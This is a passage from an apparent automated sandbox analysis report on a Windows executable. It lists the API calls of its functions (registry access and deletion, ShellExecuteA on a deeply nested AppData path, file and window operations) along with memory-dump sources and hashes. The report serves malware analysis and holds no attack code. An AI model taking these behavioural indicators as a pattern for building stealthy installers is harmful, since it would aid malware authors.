                                                                            • Part of subcall function 00402B09: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,004022CE,00000002), ref: 00402B31
                                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040246A
                                                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 0040247D
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nst19C6.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402492
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Enum$CloseOpenValue
                                                                          • String ID:
                                                                          • API String ID: 167947723-0
                                                                          • Opcode ID: 0633af6a8d689f42cdea3fe6c05a4e921a0c22368d644d20433ae29f2358fa28
                                                                          • Instruction ID: 9660451cc8f4001ddb67fa76d925c53a41d4691560438eafacefc43ff833bcd5
                                                                          • Opcode Fuzzy Hash: 0633af6a8d689f42cdea3fe6c05a4e921a0c22368d644d20433ae29f2358fa28
                                                                          • Instruction Fuzzy Hash: 1EF0D172904200EFEB11DF649E8DEBF7A6CEB41348F10483EF402B61C0E6B85E41962A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs,?), ref: 00401E1E
                                                                          Strings
                                                                          • C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs, xrefs: 00401E09
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: ExecuteShell
                                                                          • String ID: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs
                                                                          • API String ID: 587946157-2505418928
                                                                          • Opcode ID: 2591290a0fedf41aad4bbaf15587aa373bd01f26a38f330ec7367add28782182
                                                                          • Instruction ID: 131734184f761090f71c6cb732236e1bdb87e4b45d85496e26b68ac869223774
                                                                          • Opcode Fuzzy Hash: 2591290a0fedf41aad4bbaf15587aa373bd01f26a38f330ec7367add28782182
                                                                          • Instruction Fuzzy Hash: 26F096B3B041006ADB41ABB59D4EE5D7BA4EB41719F140A3AF101F71D6DAFD8842B718
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00402B09: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,004022CE,00000002), ref: 00402B31
                                                                          • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023FA
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nst19C6.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402492
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3677997916-0
                                                                          • Opcode ID: baa3017f4388861bb2d722f797e1763811390100626fa75239236033082411ec
                                                                          • Instruction ID: 7662cb523271307dcb7ca5ba8c2b35af6681fd94d107e397f9814d299b62f766
                                                                          • Opcode Fuzzy Hash: baa3017f4388861bb2d722f797e1763811390100626fa75239236033082411ec
                                                                          • Instruction Fuzzy Hash: 9211A371905215EEDB15DF64DA889AF7BB4EF05348F60843FE442B62C0D2B84A41DB2A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          • API String ID: 3850602802-0
                                                                          • Opcode ID: a305159dcb344ce7468444dd7d46bec5de4f2ab16d0ed776570ab0d658f7d881
                                                                          • Instruction ID: d8ab33b2893eeb752da5ba8574eb8ffac6e67a4653c4243f2171701694b169e5
                                                                          • Opcode Fuzzy Hash: a305159dcb344ce7468444dd7d46bec5de4f2ab16d0ed776570ab0d658f7d881
                                                                          • Instruction Fuzzy Hash: A501FF31A242209BF7194B789C04B6A3698E751368F14C23BF811F66F1EA7CDC028B4D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00402B09: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,004022CE,00000002), ref: 00402B31
                                                                          • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004022E1
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004022EA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteOpenValue
                                                                          • String ID:
                                                                          • API String ID: 849931509-0
                                                                          • Opcode ID: 107ad47164a1c9ce2c5f79379d6ab0feac024207d54a11953839c19d669ffe40
                                                                          • Instruction ID: 08cb8e98125a8f79caec059c590c17e630d8f9a81ea777e9c37a3f9ee27a84ba
                                                                          • Opcode Fuzzy Hash: 107ad47164a1c9ce2c5f79379d6ab0feac024207d54a11953839c19d669ffe40
                                                                          • Instruction Fuzzy Hash: B0F0C873A001119BDB00BBF48F4EAAE7264AB40318F10453BF101B71C1D9FC4D01A62D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A04
                                                                          • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A17
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentExpandStringslstrcmp
                                                                          • String ID:
                                                                          • API String ID: 1938659011-0
                                                                          • Opcode ID: 8f52b701dc3334d9993fced78b98813908c037aa8644f44ce47356e0d433f95f
                                                                          • Instruction ID: 6f386e2b4611097def1a9d0da8851c9b5811e39dd9fdddc04893b1deeac135d1
                                                                          • Opcode Fuzzy Hash: 8f52b701dc3334d9993fced78b98813908c037aa8644f44ce47356e0d433f95f
                                                                          • Instruction Fuzzy Hash: 4CF0A732F06251DFCB11CF699D44A9B7FE4DF51350B10803BE505F61D0D2788541DB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ShowWindow.USER32(00010474), ref: 00401579
                                                                          • ShowWindow.USER32(0001046E), ref: 0040158E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: ShowWindow
                                                                          • String ID:
                                                                          • API String ID: 1268545403-0
                                                                          • Opcode ID: c5c99cf099d59cf11b4ba8fa5fcf0e7fbb1ae8de32b1d569b78bd5dbc1b2ae04
                                                                          • Instruction ID: ab354ba23022af6ae99afc3ad479c73f7fb431a583afb052085dc210b64b1d7b
                                                                          • Opcode Fuzzy Hash: c5c99cf099d59cf11b4ba8fa5fcf0e7fbb1ae8de32b1d569b78bd5dbc1b2ae04
                                                                          • Instruction Fuzzy Hash: 36E0E577A082905FDB14CB64AD8086E77E1DB9230075845BFD101E32D1D6799D04CB18
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnableShow
                                                                          • String ID:
                                                                          • API String ID: 1136574915-0
                                                                          • Opcode ID: 345e319bbff7daafc09e7fa7245d9068ea599ef8377daeccdabb498d7e5ae18d
                                                                          • Instruction ID: 956114eb2dd735bad5388d6a49995c17c0853b2121f7b666b24c29842559ac1c
                                                                          • Opcode Fuzzy Hash: 345e319bbff7daafc09e7fa7245d9068ea599ef8377daeccdabb498d7e5ae18d
                                                                          • Instruction Fuzzy Hash: 7FE0C272E04120DFDB14FBB4AE8A56E3368DF10359F204437F602F10C1D2B89C41966E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402C6B,C:\Users\user\Desktop\hnTW5HdWvY.exe,80000000,00000003), ref: 0040580F
                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405831
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCreate
                                                                          • String ID:
                                                                          • API String ID: 415043291-0
                                                                          • Opcode ID: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
                                                                          • Instruction ID: 6507fbbaaec62448b9ae143b35cf90270df4f7fb8743d38c88d9b601ce0c16fe
                                                                          • Opcode Fuzzy Hash: 8e2162a352c9b3d6bf888d6bdf81e716fa6f6f9a74e85dd2386317c2044df056
                                                                          • Instruction Fuzzy Hash: 30D09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CB642940E0D6715C15DB16
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetFileAttributesA.KERNELBASE(?,?,004053FE,?,?,00000000,004055E1,?,?,?,?), ref: 004057EB
                                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 004057FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
